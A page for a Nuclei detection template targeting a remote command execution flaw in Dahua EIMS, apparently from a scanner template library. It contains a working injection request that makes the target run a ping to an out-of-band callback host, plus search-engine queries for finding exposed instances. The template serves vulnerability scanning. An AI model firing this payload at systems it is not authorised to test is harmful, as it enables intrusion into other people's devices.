Skip to content

Dahua EIMS - Remote Command Execution

ID: dahua-eims-rce

Severity: critical

Author: DhiyaneshDk

Tags: dahua,rce,eims

Dahua EIMS capture_handle interface allows remote command execution.

id: dahua-eims-rce
info:
name: Dahua EIMS - Remote Command Execution
author: DhiyaneshDk
severity: critical
description: |
Dahua EIMS capture_handle interface allows remote command execution.
reference:
- https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://cn-sec.com/archives/2554372.html
metadata:
verified: true
max-request: 1
fofa-query: "<title>eims</title>"
zoomeye-query: app="大华 EIMS"
tags: dahua,rce,eims
http:
- method: GET
path:
- "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: regex
regex:
- "^success$"
# digest: 490a004630440220615eea8464cf2b3e2d07dddadc6827ef69824c20fc0fa41d7a2bc53bff252d27022038a73a5f8dabfc029df076f744af64ff6e286c71c87b57ce410c8f5b6358ac48:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/dahua/dahua-eims-rce.yaml"

View on Github